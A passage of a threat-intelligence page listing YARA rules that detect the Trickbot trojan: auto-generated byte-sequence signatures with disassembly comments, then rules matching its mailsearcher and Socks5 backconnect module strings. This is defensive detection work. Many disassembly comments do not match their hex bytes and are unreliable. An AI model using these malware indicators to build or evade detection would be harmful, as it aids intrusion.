            //   8b08                 | add                 eax, 0x20
            //   8900                 | jmp                 0x42
            //   a1????????           |                     

        $sequence_148 = { 0105???????? 4881c438080000 5b 5e 5f }
            // n = 5, score = 400
            //   0105????????         |                     
            //   4881c438080000       | mov                 ecx, ebx
            //   5b                   | push                edi
            //   5e                   | push                esi
            //   5f                   | push                ebx

        $sequence_149 = { 33d2 3c73 7508 8b15???????? eb15 3c72 7508 }
            // n = 7, score = 400
            //   33d2                 | test                eax, 0x40000000
            //   3c73                 | je                  0x1d
            //   7508                 | and                 eax, 0x80000000
            //   8b15????????         |                     
            //   eb15                 | neg                 eax
            //   3c72                 | neg                 eax
            //   7508                 | sbb                 eax, eax

        $sequence_150 = { 4889d9 e8???????? 84c0 7518 }
            // n = 4, score = 400
            //   4889d9               | test                eax, eax
            //   e8????????           |                     
            //   84c0                 | je                  0x3c
            //   7518                 | dec                 eax

        $sequence_151 = { 4883c420 5e c3 488b0d???????? }
            // n = 4, score = 400
            //   4883c420             | dec                 eax
            //   5e                   | mov                 eax, dword ptr [ecx]
            //   c3                   | dec                 esp
            //   488b0d????????       |                     

        $sequence_152 = { 884c159c 48ffc2 4883fa0b 72e7 }
            // n = 4, score = 400
            //   884c159c             | je                  0x21
            //   48ffc2               | and                 eax, 0x80000000
            //   4883fa0b             | mov                 eax, dword ptr [edi]
            //   72e7                 | test                eax, 0x20000000

        $sequence_153 = { 4889742418 57 4883ec50 33ff }
            // n = 4, score = 400
            //   4889742418           | dec                 eax
            //   57                   | mov                 dword ptr [esp + 0x38], eax
            //   4883ec50             | dec                 eax
            //   33ff                 | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_154 = { 4885c0 752d eb02 32db ba01000000 }
            // n = 5, score = 400
            //   4885c0               | sbb                 eax, eax
            //   752d                 | and                 eax, 0x70
            //   eb02                 | add                 eax, 0x10
            //   32db                 | add                 eax, 2
            //   ba01000000           | jmp                 0x12

        $sequence_155 = { 84c9 75f9 2bc2 8d7001 e9???????? }
            // n = 5, score = 400
            //   84c9                 | and                 eax, 0x80000000
            //   75f9                 | and                 eax, 0x70
            //   2bc2                 | add                 eax, 0x10
            //   8d7001               | jmp                 0x2a
            //   e9????????           |                     

        $sequence_156 = { 7433 663bce 75ec 4c8bc7 8bd5 4585db 7e1f }
            // n = 7, score = 400
            //   7433                 | sbb                 eax, eax
            //   663bce               | and                 eax, 0x20
            //   75ec                 | add                 eax, 0x20
            //   4c8bc7               | jmp                 0x3e
            //   8bd5                 | and                 eax, 0x80000000
            //   4585db               | neg                 eax
            //   7e1f                 | sbb                 eax, eax

        $sequence_157 = { 4889f9 e8???????? 84c0 7412 }
            // n = 4, score = 400
            //   4889f9               | dec                 eax
            //   e8????????           |                     
            //   84c0                 | mov                 edx, eax
            //   7412                 | dec                 eax

        $sequence_158 = { 488905???????? 488905???????? 488905???????? 488905???????? 488905???????? 488905???????? e8???????? }
            // n = 7, score = 400
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   e8????????           |                     

        $sequence_159 = { 8be5 5d c20800 8b45f4 8b4dfc }
            // n = 5, score = 400
            //   8be5                 | add                 eax, 0x20
            //   5d                   | jmp                 0x42
            //   c20800               | and                 eax, 0x80000000
            //   8b45f4               | add                 eax, 0x20
            //   8b4dfc               | jmp                 0x38

        $sequence_160 = { 488d542460 ff15???????? 85c0 7413 }
            // n = 4, score = 300
            //   488d542460           | dec                 eax
            //   ff15????????         |                     
            //   85c0                 | mov                 dword ptr [esp + 0x30], eax
            //   7413                 | dec                 eax

        $sequence_161 = { 720d 80f920 7408 80c1bf }
            // n = 4, score = 300
            //   720d                 | neg                 eax
            //   80f920               | neg                 eax
            //   7408                 | sbb                 eax, eax
            //   80c1bf               | and                 eax, 2

        $sequence_162 = { ba01000000 488bc8 ff15???????? 488bd8 4885c0 }
            // n = 5, score = 300
            //   ba01000000           | mov                 eax, dword ptr [ecx + 0x20]
            //   488bc8               | dec                 eax
            //   ff15????????         |                     
            //   488bd8               | mov                 edx, dword ptr [ecx + 0x18]
            //   4885c0               | dec                 eax

        $sequence_163 = { e8???????? 83c41c 85c0 0f848a000000 }
            // n = 4, score = 300
            //   e8????????           |                     
            //   83c41c               | add                 esp, 0x1c
            //   85c0                 | test                eax, eax
            //   0f848a000000         | je                  0x90

        $sequence_164 = { 50 897df0 e8???????? 8bf0 85f6 }
            // n = 5, score = 300
            //   50                   | neg                 eax
            //   897df0               | sbb                 eax, eax
            //   e8????????           |                     
            //   8bf0                 | and                 eax, 7
            //   85f6                 | inc                 eax

        $sequence_165 = { 84c0 0f94c1 890d???????? e8???????? }
            // n = 4, score = 300
            //   84c0                 | mov                 dword ptr [esp + 0x38], eax
            //   0f94c1               | dec                 eax
            //   890d????????         |                     
            //   e8????????           |                     

        $sequence_166 = { c1e50a 03eb 8bd5 c1ea06 }
            // n = 4, score = 300
            //   c1e50a               | add                 eax, 2
            //   03eb                 | jmp                 0x17
            //   8bd5                 | and                 eax, 0x80000000
            //   c1ea06               | neg                 eax

        $sequence_167 = { 33c9 c744242000000000 ff15???????? 488905???????? }
            // n = 4, score = 300
            //   33c9                 | mov                 edx, dword ptr [ecx]
            //   c744242000000000     | dec                 esp
            //   ff15????????         |                     
            //   488905????????       |                     

        $sequence_168 = { ba01000000 8bce 448d4205 ff15???????? }
            // n = 4, score = 300
            //   ba01000000           | mov                 edx, dword ptr [ecx]
            //   8bce                 | dec                 esp
            //   448d4205             | mov                 ecx, dword ptr [ecx + 0x28]
            //   ff15????????         |                     

        $sequence_169 = { e8???????? eb05 b857000780 85c0 7907 85ff }
            // n = 6, score = 300
            //   e8????????           |                     
            //   eb05                 | sbb                 eax, eax
            //   b857000780           | and                 eax, 0x20
            //   85c0                 | add                 eax, 0x20
            //   7907                 | jmp                 0x42
            //   85ff                 | and                 eax, 0x80000000

        $sequence_170 = { 4c8905???????? 4889442420 e8???????? 48c705????????07000000 }
            // n = 4, score = 300
            //   4c8905????????       |                     
            //   4889442420           | dec                 eax
            //   e8????????           |                     
            //   48c705????????07000000     |     

        $sequence_171 = { 488bd7 488d4d80 e8???????? 90 }
            // n = 4, score = 300
            //   488bd7               | dec                 eax
            //   488d4d80             | mov                 edx, dword ptr [ecx + 0x18]
            //   e8????????           |                     
            //   90                   | dec                 eax

        $sequence_172 = { 5e 5b c3 48895c2410 56 }
            // n = 5, score = 300
            //   5e                   | mov                 dword ptr [esp + 0x40], eax
            //   5b                   | dec                 eax
            //   c3                   | mov                 dword ptr [esp + 0x28], eax
            //   48895c2410           | dec                 eax
            //   56                   | mov                 eax, dword ptr [ecx + 0x30]

        $sequence_173 = { e8???????? 85c0 7407 b801000000 eb05 }
            // n = 5, score = 300
            //   e8????????           |                     
            //   85c0                 | js                  0x1d
            //   7407                 | dec                 eax
            //   b801000000           | cwde                
            //   eb05                 | dec                 eax

        $sequence_174 = { 4983c8ff 49ffc0 42381c00 75f7 }
            // n = 4, score = 300
            //   4983c8ff             | dec                 eax
            //   49ffc0               | mov                 edx, dword ptr [ecx + 0x18]
            //   42381c00             | dec                 eax
            //   75f7                 | mov                 ecx, dword ptr [ecx + 0x10]

        $sequence_175 = { 48c1f803 4c2bf8 498bd7 e8???????? }
            // n = 4, score = 300
            //   48c1f803             | mov                 eax, dword ptr [ecx]
            //   4c2bf8               | dec                 esp
            //   498bd7               | mov                 eax, dword ptr [ecx + 0x20]
            //   e8????????           |                     

        $sequence_176 = { 8bec 56 57 6a04 ff15???????? }
            // n = 5, score = 200
            //   8bec                 | je                  0x2b
            //   56                   | test                eax, 0x40000000
            //   57                   | je                  0x1a
            //   6a04                 | and                 eax, 0x80000000
            //   ff15????????         |                     

        $sequence_177 = { 53 53 6aff 50 53 53 ff15???????? }
            // n = 7, score = 200
            //   53                   | push                ebx
            //   53                   | push                ebx
            //   6aff                 | push                -1
            //   50                   | push                eax
            //   53                   | push                ebx
            //   53                   | push                ebx
            //   ff15????????         |                     

        $sequence_178 = { e8???????? 4585ff 0f85d2000000 c78424a400000074656d44 c78424b000000063617065 }
            // n = 5, score = 200
            //   e8????????           |                     
            //   4585ff               | pop                 esi
            //   0f85d2000000         | pop                 edi
            //   c78424a400000074656d44     | dec    eax
            //   c78424b000000063617065     | test    ecx, ecx

        $sequence_179 = { 8d45f4 c60668 50 8d4601 50 e8???????? }
            // n = 6, score = 200
            //   8d45f4               | lea                 eax, [ebp - 0xc]
            //   c60668               | mov                 byte ptr [esi], 0x68
            //   50                   | push                eax
            //   8d4601               | lea                 eax, [esi + 1]
            //   50                   | push                eax
            //   e8????????           |                     

        $sequence_180 = { c744242801000000 4533c9 895c2420 4533c0 8d5301 8d4b02 ff15???????? }
            // n = 7, score = 200
            //   c744242801000000     | mov                 eax, dword ptr [ecx + 0x38]
            //   4533c9               | dec                 eax
            //   895c2420             | mov                 dword ptr [esp + 0x28], eax
            //   4533c0               | dec                 eax
            //   8d5301               | mov                 eax, dword ptr [ecx + 0x30]
            //   8d4b02               | dec                 eax
            //   ff15????????         |                     

        $sequence_181 = { eb20 488b942430080000 488d0d11230000 e8???????? }
            // n = 4, score = 200
            //   eb20                 | push                edi
            //   488b942430080000     | push                esi
            //   488d0d11230000       | push                ebx
            //   e8????????           |                     

        $sequence_182 = { 80f90d 7418 80f90a 7413 }
            // n = 4, score = 200
            //   80f90d               | cmp                 cl, 0xd
            //   7418                 | je                  0x1a
            //   80f90a               | cmp                 cl, 0xa
            //   7413                 | je                  0x15

        $sequence_183 = { 85c0 0f85f7000000 488b5f10 33c0 488945f2 33c9 44897df0 }
            // n = 7, score = 200
            //   85c0                 | mov                 eax, dword ptr [ecx + 0x40]
            //   0f85f7000000         | dec                 eax
            //   488b5f10             | mov                 dword ptr [esp + 0x30], eax
            //   33c0                 | dec                 eax
            //   488945f2             | mov                 eax, dword ptr [ecx + 0x38]
            //   33c9                 | dec                 eax
            //   44897df0             | mov                 dword ptr [esp + 0x28], eax

        $sequence_184 = { 4889ca 4c89442428 4889d9 ff15???????? 48833d????????00 4889d9 }
            // n = 6, score = 200
            //   4889ca               | xor                 ecx, ecx
            //   4c89442428           | inc                 ebp
            //   4889d9               | xor                 eax, eax
            //   ff15????????         |                     
            //   48833d????????00     |                     
            //   4889d9               | xor                 edx, edx

        $sequence_185 = { 50 6a09 ff15???????? 50 ff15???????? 8bf8 }
            // n = 6, score = 200
            //   50                   | add                 eax, 0x20
            //   6a09                 | jmp                 0x3b
            //   ff15????????         |                     
            //   50                   | and                 eax, 0x80000000
            //   ff15????????         |                     
            //   8bf8                 | neg                 eax

        $sequence_186 = { c78424b4000000642e6578 c78424a000000025537973 488d9424a0000000 488dac24b0010000 }
            // n = 4, score = 200
            //   c78424b4000000642e6578     | je    7
            //   c78424a000000025537973     | dec    ecx
            //   488d9424a0000000     | mov                 eax, esi
            //   488dac24b0010000     | inc                 ebp

        $sequence_187 = { e8???????? 83c448 8d4614 6a03 68???????? }
            // n = 5, score = 200
            //   e8????????           |                     
            //   83c448               | add                 esp, 0x48
            //   8d4614               | lea                 eax, [esi + 0x14]
            //   6a03                 | push                3
            //   68????????           |                     

        $sequence_188 = { 0fb64101 41884001 0fb64102 41884002 0fb64103 41884003 4180f905 }
            // n = 7, score = 200
            //   0fb64101             | dec                 eax
            //   41884001             | mov                 eax, dword ptr [ecx + 0x30]
            //   0fb64102             | dec                 eax
            //   41884002             | mov                 ecx, dword ptr [ecx + 0x10]
            //   0fb64103             | dec                 eax
            //   41884003             | mov                 dword ptr [esp + 0x20], eax
            //   4180f905             | dec                 eax

        $sequence_189 = { e8???????? eb24 3d36040000 757a 89f0 8d7001 }
            // n = 6, score = 200
            //   e8????????           |                     
            //   eb24                 | dec                 eax
            //   3d36040000           | sub                 esp, 0x838
            //   757a                 | dec                 eax
            //   89f0                 | add                 esp, 0x838
            //   8d7001               | pop                 ebx

        $sequence_190 = { 0f1f840000000000 c60100 8d4901 83ee01 }
            // n = 4, score = 200
            //   0f1f840000000000     | add                 eax, 2
            //   c60100               | jmp                 0x12
            //   8d4901               | and                 eax, 0x80000000
            //   83ee01               | neg                 eax

        $sequence_191 = { ff15???????? 8bc8 898d08ffffff 85c9 }
            // n = 4, score = 200
            //   ff15????????         |                     
            //   8bc8                 | mov                 ecx, eax
            //   898d08ffffff         | mov                 dword ptr [ebp - 0xf8], ecx
            //   85c9                 | test                ecx, ecx

        $sequence_192 = { 50 8d461a 50 e8???????? 83c448 66c7461effd0 }
            // n = 6, score = 200
            //   50                   | push                eax
            //   8d461a               | lea                 eax, [esi + 0x1a]
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c448               | add                 esp, 0x48
            //   66c7461effd0         | mov                 word ptr [esi + 0x1e], 0xd0ff

        $sequence_193 = { 50 8d4627 50 e8???????? 83c448 66c7462bffd0 }
            // n = 6, score = 200
            //   50                   | push                eax
            //   8d4627               | lea                 eax, [esi + 0x27]
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c448               | add                 esp, 0x48
            //   66c7462bffd0         | mov                 word ptr [esi + 0x2b], 0xd0ff

        $sequence_194 = { 8b451c a3???????? 8b4520 a3???????? }
            // n = 4, score = 200
            //   8b451c               | cmp                 eax, edi
            //   a3????????           |                     
            //   8b4520               | ja                  0x1d
            //   a3????????           |                     

        $sequence_195 = { 3d12500000 0f95c0 84c0 0f841b020000 c745f400000000 837df400 }
            // n = 6, score = 100
            //   3d12500000           | test                eax, eax
            //   0f95c0               | js                  0x48
            //   84c0                 | dec                 eax
            //   0f841b020000         | mov                 dword ptr [esp + 0x20], edi
            //   c745f400000000       | dec                 eax
            //   837df400             | lea                 edi, [edx - 1]

        $sequence_196 = { ff15???????? 50 ff15???????? 898540feffff 68???????? 68???????? ff15???????? }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   50                   | mov                 dword ptr [esp + 0x20], eax
            //   ff15????????         |                     
            //   898540feffff         | dec                 esp
            //   68????????           |                     
            //   68????????           |                     
            //   ff15????????         |                     

        $sequence_197 = { e8???????? 85c0 0f84c6faffff 8b45f8 50 e8???????? }
            // n = 6, score = 100
            //   e8????????           |                     
            //   85c0                 | add                 eax, 0x10
            //   0f84c6faffff         | jmp                 0x2d
            //   8b45f8               | test                eax, 0x40000000
            //   50                   | je                  0x20
            //   e8????????           |                     

        $sequence_198 = { 7e2c bb01000000 53 8bc7 b901000000 8b15???????? }
            // n = 6, score = 100
            //   7e2c                 | and                 eax, 0x80000000
            //   bb01000000           | neg                 eax
            //   53                   | sbb                 eax, eax
            //   8bc7                 | and                 eax, 7
            //   b901000000           | and                 eax, 0x70
            //   8b15????????         |                     

        $sequence_199 = { 894db4 8b55b4 83c201 89959cfeffff }
            // n = 4, score = 100
            //   894db4               | dec                 eax
            //   8b55b4               | mov                 edx, dword ptr [ecx + 0x18]
            //   83c201               | dec                 eax
            //   89959cfeffff         | mov                 dword ptr [esp + 0x40], eax

        $sequence_200 = { ff75dc 8d8578fcffff 68???????? 50 ff15???????? 8b45fc 8d9518ffffff }
            // n = 7, score = 100
            //   ff75dc               | sbb                 eax, eax
            //   8d8578fcffff         | and                 eax, 0x70
            //   68????????           |                     
            //   50                   | and                 eax, 0x20
            //   ff15????????         |                     
            //   8b45fc               | add                 eax, 0x20
            //   8d9518ffffff         | jmp                 0x3e

        $sequence_201 = { c645f100 8b4da0 51 68???????? 8b55ec }
            // n = 5, score = 100
            //   c645f100             | dec                 eax
            //   8b4da0               | mov                 eax, dword ptr [ecx + 0x48]
            //   51                   | dec                 eax
            //   68????????           |                     
            //   8b55ec               | mov                 dword ptr [esp + 0x38], eax

        $sequence_202 = { 83c408 eb18 81ff01030000 7d10 }
            // n = 4, score = 100
            //   83c408               | je                  0x1d
            //   eb18                 | and                 eax, 0x20
            //   81ff01030000         | add                 eax, 0x20
            //   7d10                 | jmp                 0x3b

        $sequence_203 = { 50 8b45ec 50 e8???????? 8b5de8 33c0 }
            // n = 6, score = 100
            //   50                   | neg                 eax
            //   8b45ec               | sbb                 eax, eax
            //   50                   | and                 eax, 0x70
            //   e8????????           |                     
            //   8b5de8               | and                 eax, 2
            //   33c0                 | add                 eax, 2

        $sequence_204 = { 12f7 5d 12f7 f30a6b5d }
            // n = 4, score = 100
            //   12f7                 | neg                 eax
            //   5d                   | sbb                 eax, eax
            //   12f7                 | and                 eax, 2
            //   f30a6b5d             | add                 eax, 2

        $sequence_205 = { 83c408 85c0 0f85d4020000 83bdc0feffff00 }
            // n = 4, score = 100
            //   83c408               | dec                 esp
            //   85c0                 | mov                 edx, dword ptr [ecx]
            //   0f85d4020000         | dec                 esp
            //   83bdc0feffff00       | mov                 ecx, dword ptr [ecx + 0x28]

        $sequence_206 = { e9???????? 837d1001 7e1b c744243810000000 }
            // n = 4, score = 100
            //   e9????????           |                     
            //   837d1001             | dec                 eax
            //   7e1b                 | cmp                 eax, edi
            //   c744243810000000     | dec                 eax

        $sequence_207 = { 53 ff15???????? 53 8bf0 ff15???????? ff15???????? 3dcbd41200 }
            // n = 7, score = 100
            //   53                   | add                 eax, 0x20
            //   ff15????????         |                     
            //   53                   | jmp                 0x40
            //   8bf0                 | and                 eax, 0x80000000
            //   ff15????????         |                     
            //   ff15????????         |                     
            //   3dcbd41200           | neg                 eax

        $sequence_208 = { 52 8d55b8 52 8b08 6a01 }
            // n = 5, score = 100
            //   52                   | and                 eax, 0x80000000
            //   8d55b8               | neg                 eax
            //   52                   | jmp                 0x27
            //   8b08                 | test                eax, 0x40000000
            //   6a01                 | je                  0x1a

        $sequence_209 = { c6041000 b901000000 6bd100 8b85ecfeffff c6041000 b901000000 }
            // n = 6, score = 100
            //   c6041000             | dec                 esp
            //   b901000000           | mov                 eax, dword ptr [ecx + 0x20]
            //   6bd100               | dec                 eax
            //   8b85ecfeffff         | mov                 edx, dword ptr [ecx + 0x18]
            //   c6041000             | dec                 esp
            //   b901000000           | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_210 = { 8945a8 8b45a8 85c0 7908 }
            // n = 4, score = 100
            //   8945a8               | mov                 dword ptr [esp + 0x20], edi
            //   8b45a8               | dec                 eax
            //   85c0                 | lea                 edi, [edx - 1]
            //   7908                 | dec                 esp

        $sequence_211 = { 8b4c2420 8b7c2410 d9c0 c744247c01000000 d8f2 }
            // n = 5, score = 100
            //   8b4c2420             | lea                 ecx, [esp + 0x58]
            //   8b7c2410             | dec                 eax
            //   d9c0                 | mov                 edx, edi
            //   c744247c01000000     | test                eax, eax
            //   d8f2                 | jbe                 7

        $sequence_212 = { c645cc8b c645cdfe c645ceef c645cf8c c645d023 c645d199 }
            // n = 6, score = 100
            //   c645cc8b             | mov                 ecx, dword ptr [ecx + 0x28]
            //   c645cdfe             | dec                 esp
            //   c645ceef             | mov                 eax, dword ptr [ecx + 0x20]
            //   c645cf8c             | dec                 eax
            //   c645d023             | mov                 edx, dword ptr [ecx + 0x18]
            //   c645d199             | dec                 eax

        $sequence_213 = { d9ee d9c9 83c301 dfe9 ddd8 }
            // n = 5, score = 100
            //   d9ee                 | cmp                 edx, 0x7fffffff
            //   d9c9                 | jbe                 7
            //   83c301               | mov                 eax, 0x80070057
            //   dfe9                 | test                eax, eax
            //   ddd8                 | js                  0x51

        $sequence_214 = { 33f6 8bc7 e8???????? 5e 33c0 }
            // n = 5, score = 100
            //   33f6                 | and                 eax, 0x70
            //   8bc7                 | add                 eax, 0x10
            //   e8????????           |                     
            //   5e                   | jmp                 0x2a
            //   33c0                 | test                eax, 0x40000000

        $sequence_215 = { 61 34aa 8bdf 56 }
            // n = 4, score = 100
            //   61                   | and                 eax, 0x80000000
            //   34aa                 | neg                 eax
            //   8bdf                 | sbb                 eax, eax
            //   56                   | and                 eax, 0x70

        $sequence_216 = { 61 34aa 3611fe 3611fe 3611fe }
            // n = 5, score = 100
            //   61                   | test                eax, 0x20000000
            //   34aa                 | je                  0x30
            //   3611fe               | test                eax, 0x40000000
            //   3611fe               | je                  0x1f
            //   3611fe               | and                 eax, 0x80000000

        $sequence_217 = { 68e9fd0000 ff15???????? 8bf0 85f6 7506 5f 5e }
            // n = 7, score = 100
            //   68e9fd0000           | sbb                 eax, eax
            //   ff15????????         |                     
            //   8bf0                 | and                 eax, 0x70
            //   85f6                 | add                 eax, 0x10
            //   7506                 | jmp                 0x2d
            //   5f                   | and                 eax, 0x80000000
            //   5e                   | neg                 eax

        $sequence_218 = { 837c241400 7c06 ff15???????? 85f6 }
            // n = 4, score = 100
            //   837c241400           | and                 eax, 0x80000000
            //   7c06                 | neg                 eax
            //   ff15????????         |                     
            //   85f6                 | sbb                 eax, eax

        $sequence_219 = { 57 2ac8 57 2ac8 57 2ac8 }
            // n = 6, score = 100
            //   57                   | and                 eax, 7
            //   2ac8                 | sbb                 eax, eax
            //   57                   | and                 eax, 0x70
            //   2ac8                 | add                 eax, 0x10
            //   57                   | jmp                 0x2d
            //   2ac8                 | test                eax, 0x40000000

        $sequence_220 = { 898554feffff 0fb64df3 85c9 7520 8b95a0feffff 83ea01 3955c4 }
            // n = 7, score = 100
            //   898554feffff         | dec                 eax
            //   0fb64df3             | mov                 eax, dword ptr [ecx + 0x40]
            //   85c9                 | dec                 eax
            //   7520                 | mov                 dword ptr [esp + 0x30], eax
            //   8b95a0feffff         | dec                 eax
            //   83ea01               | mov                 edx, dword ptr [ecx + 0x18]
            //   3955c4               | dec                 eax

        $sequence_221 = { 6a08 ff15???????? 50 ff15???????? 5f 5e }
            // n = 6, score = 100
            //   6a08                 | sbb                 eax, eax
            //   ff15????????         |                     
            //   50                   | and                 eax, 2
            //   ff15????????         |                     
            //   5f                   | add                 eax, 2
            //   5e                   | jmp                 0x1e

        $sequence_222 = { 837c242439 0f8458ffffff 8b442444 c744242820000000 83c031 }
            // n = 5, score = 100
            //   837c242439           | dec                 esp
            //   0f8458ffffff         | lea                 ecx, [esp + 0x58]
            //   8b442444             | dec                 eax
            //   c744242820000000     | mov                 edx, edi
            //   83c031               | dec                 eax

        $sequence_223 = { 8b85acefffff e8???????? 50 6801000080 e8???????? 85c0 0f8544050000 }
            // n = 7, score = 100
            //   8b85acefffff         | neg                 eax
            //   e8????????           |                     
            //   50                   | sbb                 eax, eax
            //   6801000080           | add                 eax, 0x20
            //   e8????????           |                     
            //   85c0                 | jmp                 0x3b
            //   0f8544050000         | and                 eax, 0x80000000

        $sequence_224 = { 899580feffff c645fc02 8b8580feffff 50 8d8da8feffff e8???????? }
            // n = 6, score = 100
            //   899580feffff         | mov                 dword ptr [esp + 0x38], eax
            //   c645fc02             | dec                 eax
            //   8b8580feffff         | mov                 eax, dword ptr [ecx + 0x40]
            //   50                   | dec                 eax
            //   8d8da8feffff         | mov                 eax, dword ptr [ecx + 0x50]
            //   e8????????           |                     

        $sequence_225 = { 61 34aa dccb 6a61 34aa 61 34aa }
            // n = 7, score = 100
            //   61                   | jmp                 0x17
            //   34aa                 | and                 eax, 2
            //   dccb                 | add                 eax, 2
            //   6a61                 | jmp                 0x12
            //   34aa                 | and                 eax, 0x80000000
            //   61                   | neg                 eax
            //   34aa                 | sbb                 eax, eax

        $sequence_226 = { ff75f4 51 8b11 ff521c }
            // n = 4, score = 100
            //   ff75f4               | add                 eax, 0x10
            //   51                   | jmp                 0x2a
            //   8b11                 | test                eax, 0x40000000
            //   ff521c               | je                  0x1d

        $sequence_227 = { e8???????? 48 85c0 0f8c9d050000 40 8945c0 33f6 }
            // n = 7, score = 100
            //   e8????????           |                     
            //   48                   | add                 eax, 2
            //   85c0                 | jmp                 0x12
            //   0f8c9d050000         | and                 eax, 0x80000000
            //   40                   | neg                 eax
            //   8945c0               | sbb                 eax, eax
            //   33f6                 | neg                 eax

        $sequence_228 = { 79f9 89651c 83c8ff 8be5 5d }
            // n = 5, score = 100
            //   79f9                 | sbb                 eax, eax
            //   89651c               | and                 eax, 2
            //   83c8ff               | add                 eax, 2
            //   8be5                 | jmp                 0x17
            //   5d                   | and                 eax, 0x80000000

        $sequence_229 = { 83c404 8b45f8 8a4418ff 8b17 88441aff }
            // n = 5, score = 100
            //   83c404               | sbb                 eax, eax
            //   8b45f8               | and                 eax, 0x70
            //   8a4418ff             | add                 eax, 0x10
            //   8b17                 | jmp                 0x27
            //   88441aff             | test                eax, 0x40000000

    condition:
        7 of them and filesize < 18563072
}
[TLP:WHITE] win_trickbot_w0   (20170613 | Detects mailsearcher module from Trickbot Trojan)
rule win_trickbot_w0 {
    meta:
        author = "Marc Salinas @Bondey_m"
        description = "Detects mailsearcher module from Trickbot Trojan"
        reference = "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
        malpedia_version = "20170613"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    strings:
        $str_mails_01 = "mailsearcher"
        $str_mails_02 = "handler"
        $str_mails_03 = "conf"
        $str_mails_04 = "ctl"
        $str_mails_05 = "SetConf"
        $str_mails_06 = "file"
        $str_mails_07 = "needinfo"
        $str_mails_08 = "mailconf"
    condition:
        all of ($str_mails_*)
}
[TLP:WHITE] win_trickbot_w1   (20171214 | Trickbot Socks5 bckconnect module)
rule win_trickbot_w1 {
    meta:
        description = "Trickbot Socks5 bckconnect module"
        author = "@VK_Intel"
        reference = "Detects the unpacked Trickbot backconnect in memory"
        date = "2017-11-19"
        hash = "f2428d5ff8c93500da92f90154eebdf0"
        source = "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
        malpedia_version = "20171214"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    strings:
        $s0 = "socks5dll.dll" fullword ascii
        $s1 = "auth_login" fullword ascii
        $s2 = "auth_ip" fullword ascii
        $s3 = "connect" fullword ascii
        $s4 = "auth_ip" fullword ascii
        $s5 = "auth_pass" fullword ascii
        $s6 = "thread.entry_event" fullword ascii
        $s7 = "thread.exit_event" fullword ascii
        $s8 = "</moduleconfig>" fullword ascii
        $s9 = "<moduleconfig>" fullword ascii
        $s10 = "<autostart>yes</autostart>" fullword ascii
    condition:
        all of them
}
Download all Yara Rules